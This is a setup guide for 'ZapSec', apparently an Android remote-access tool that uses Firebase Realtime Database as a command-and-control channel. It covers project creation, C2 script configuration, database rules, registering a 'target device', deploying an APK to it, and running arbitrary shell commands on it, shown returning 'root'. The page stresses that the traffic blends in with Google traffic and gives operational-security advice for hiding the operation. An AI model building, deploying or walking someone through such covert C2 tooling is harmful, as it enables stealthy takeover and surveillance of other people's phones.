ZapSec | Firebase C2 Setup

🔐 Security Architecture

Anonymous Auth

APK authenticates to Firebase without credentials

Device Whitelist

Only pre-registered devices can access C2

HMAC Signing

All commands signed with 256-bit key

TLS Encryption

All traffic encrypted via Firebase HTTPS

Challenge-Response

Device proves identity before C2 activation

Blended Traffic

Looks like normal Google/Firebase traffic

📦 Deployment Package

Generated files ready for Firebase setup:

📱 Download APK 📄 Deployment Package

⚠️ SECURITY WARNING:
The APK contains embedded secrets (Device Secret + HMAC Key).
Treat the APK as sensitive — anyone with it can potentially access your C2.
Create a dedicated Firebase project for this operation only.

🚀 Setup Instructions

Step 1: Create Firebase Project

Go to console.firebase.google.com
Create new project (e.g., "zapsec-c2")
Enable Realtime Database
Choose Locked Mode for security rules initially

Step 2: Get Credentials

Database URL: Project Settings → Realtime Database → Copy URL
Web API Key: Project Settings → General → Web API Key

Step 3: Update C2 Scripts

# Edit these values in secure_firebase_c2.py and secure_c2_server.py
FIREBASE_URL = "https://your-project-default-rtdb.firebaseio.com"
API_KEY = "your-actual-web-api-key"
DEVICE_ID = "target_device_001"
            

Step 4: Configure Security Rules

Go to Realtime Database → Rules tab. Paste these rules:

{
  "rules": {
    ".read": false,
    ".write": false,
    
    "c2": {
      "$deviceId": {
        ".read": "auth != null && root.child('devices/' + $deviceId + '/authorized').val() == true",
        ".write": "auth != null && root.child('devices/' + $deviceId + '/authorized').val() == true",
        
        "status": { ".validate": "newData.isString()" },
        
        "commands": {
          "$cmdId": {
            ".validate": "newData.hasChildren(['cmd', 'timestamp', 'signature'])"
          }
        },
        
        "results": {
          "$cmdId": {
            ".validate": "newData.hasChildren(['output', 'timestamp'])"
          }
        }
      }
    },
    
    "devices": {
      ".read": "auth != null && root.child('admin/' + auth.uid).exists()",
      ".write": "auth != null && root.child('admin/' + auth.uid).exists()",
      "$deviceId": {
        ".validate": "newData.hasChildren(['authorized', 'secretHash'])"
      }
    }
  }
}
            

Step 5: Register Device

Use Firebase CLI or REST API to register the device:

# Using Firebase CLI
firebase database:set /devices/target_device_001 '{"authorized":true,"secretHash":"YOUR_SECRET_HASH","registeredAt":{".sv":"timestamp"}}'

# Or via REST (replace URL and token)
curl -X PUT "https://your-project.firebaseio.com/devices/target_device_001.json?auth=TOKEN" \
  -d '{"authorized":true,"secretHash":"HASH","registeredAt":{".sv":"timestamp"}}'
            

Step 6: Run C2 Server

# On your C2 machine
python3 secure_c2_server.py

# You should see:
# [+] Authenticated with Firebase
# SECURE-C2 [target_device_001]>
            

Step 7: Deploy APK

Download APK from portal
Deploy to target device
When app opens, it will authenticate with Firebase
C2 server will show device as "online"

✅ Pre-Deployment Checklist

Created dedicated Firebase project
Enabled Realtime Database
Copied Database URL and API Key
Updated C2 scripts with credentials
Set Firebase Security Rules
Registered device in Firebase
Tested C2 server authentication
Downloaded latest APK
Verified APK signatures
Tested on non-target device first

🎯 Usage

From C2 Server:

SECURE-C2 [target_device_001]> !status
[+] Device authenticated

SECURE-C2 [target_device_001]> whoami
[+] Command sent

--------------------------------------------------
RESULT:
--------------------------------------------------
root
--------------------------------------------------
            

Supported Commands:

!status — Check device connection
!exit — Exit C2 shell
any shell command — Executed on device

🔥 Why Firebase?

Stealth: Traffic blends with normal Google services
Reliability: 99.95% uptime SLA
Global: Works through most firewalls/proxies
Scalable: Can handle many devices
Secure: TLS + Firebase Auth built-in

⚠️ Operational Security

Use dedicated Firebase project (don't reuse personal account)
Rotate/delete Firebase project after operation
APK contains secrets — don't distribute widely
Firebase logs may persist — consider data retention
Test thoroughly on non-target devices first

⚡ SECURE FIREBASE C2